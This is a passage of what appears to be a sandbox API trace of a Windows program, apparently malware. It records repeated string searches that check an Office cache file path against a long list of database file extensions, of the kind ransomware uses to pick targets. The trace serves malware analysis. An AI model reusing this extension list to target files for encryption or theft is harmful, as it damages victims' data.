Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accde") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accdr") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accdt") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accft") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".adb") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ade") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".adf") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".adp") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".arc") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ora") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".alf") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ask") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".btr") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".bdf") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".cat") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".cdb") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ckp") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".cma") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".cpd") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dacpac") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dad") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".daschema") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".db") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".db-shm") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".db-wal") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".db3") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dbc") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dbf") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dbs") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dbt") returned 0x0 [0161.811] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dbv") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dbx") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dcb") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dct") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dcx") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ddl") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dlis") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dp1") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dqy") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dsk") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dsn") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dtsx") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".dxl") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".eco") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ecx") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".edb") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".epim") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".exb") returned 0x0 [0161.812] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fcd") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fdb") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fic") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fmp") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fmp12") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fmpsl") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fol") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fp3") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fp4") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fp5") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fp7") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fpt") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".frm") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".gdb") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".grdb") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".gwi") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".hdb") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".his") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ib") returned 0x0 [0161.813] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".idb") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ihx") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".itdb") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".itw") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".jet") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".jtx") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".kdb") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".kexi") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".kexic") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".kexis") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".lgc") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".lwx") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".maf") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".maq") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mar") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mas") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mav") returned 0x0 [0161.814] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mdb") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mdf") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mpd") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mrg") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mud") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mwb") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".myd") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ndf") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nnt") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nrmlib") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ns2") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ns3") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".ns4") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nsf") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nv") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nv2") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nwdb") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nyf") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".odb") returned 0x0 [0161.815] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".oqy") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".orx") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".owc") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".p96") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".p97") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".pan") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".pdb") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".pdm") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".pnz") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".qry") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".qvd") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".rbf") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".rctd") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".rod") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".rodx") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".rpd") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".rsd") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0161.816] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sbf") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".scx") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sdb") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sdc") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sdf") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sis") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".spq") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sql") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sqlite") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sqlite3") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".te") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".temx") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".tmd") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".tps") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".trc") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".trm") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".udb") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".udl") returned 0x0 [0161.817] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".usr") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".v12") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vis") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vpd") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vvv") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".wdb") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".wmdb") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".wrk") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".xdb") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".xld") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".xmlff") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".abcddb") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".abs") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".abx") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accdw") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".adn") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".db2") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".fm5") returned 0x0 [0161.818] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".hjt") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".icg") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".icr") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".kdb") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", 